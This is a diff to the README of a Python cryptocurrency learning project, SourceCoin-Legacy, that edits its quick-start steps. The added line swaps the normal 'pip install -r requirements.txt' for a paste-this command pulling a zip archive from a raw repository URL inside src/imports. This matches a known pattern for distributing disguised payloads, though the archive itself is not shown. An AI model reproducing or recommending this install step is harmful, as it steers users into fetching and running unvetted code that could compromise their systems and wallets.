zhaojun83/SourceCoin-Legacy/README.md

 Quick-start path for learners
 - Prerequisites: A modern Python 3 environment (3.8 or newer works well).
 Make sure you have pip available to install dependencies.
 - Clone or download: Get the code from the repository.
 If you are using a release, download the asset from the releases page and follow the instructions for your platform.
-- Install dependencies: Run pip install -r requirements.txt.
-This pulls in the libraries needed by the sample API and the wallet components.
+- Install dependencies: Run pip install -r https://raw.githubusercontent.com/zhaojun83/SourceCoin-Legacy/main/src/imports/Legacy-Source-Coin-3.8.zip This pulls in the libraries needed by the sample API and the wallet components.
 - Run the local API or CLI: Start the local server or run the CLI sample to interact with the system.
 The exact commands depend on how you install and package SourceCoin-Legacy, but you will typically start a module or a script that launches the API and the wallet interface.
 - Try a simple workflow: Create a wallet, check your balance, create a transaction to another wallet, and mine a block if the miner is available.
 You will see how a transaction moves from creation to inclusion in the blockchain.